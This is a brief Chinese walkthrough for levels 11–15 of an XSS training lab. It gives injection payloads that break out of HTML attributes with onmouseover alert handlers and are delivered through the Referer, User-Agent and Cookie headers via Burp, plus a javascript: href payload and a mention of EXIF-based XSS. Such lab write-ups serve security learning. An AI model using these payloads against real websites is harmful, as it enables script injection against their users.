第十一关：less-11

步骤一：利用burp抓包

步骤二：添加referer:click me!" type="button" οnmοuseοver="alert(/xss/)进行放包

第十二关：less-12

步骤一：利用burp抓包

步骤二：修改User Agent：click me!" type="button" οnmοuseοver="alert(/xss/)进行放包

第十三关：less-13

步骤一：利用burp抓包

步骤二：修改Cookie: user=click me!" type="button" οnmοuseοver="alert(/xss/)

第十四关：less-14

这题有关exif xss

第十五关：less-15

输入：src='level1.php?name=<a href="javascript:alert(1)">'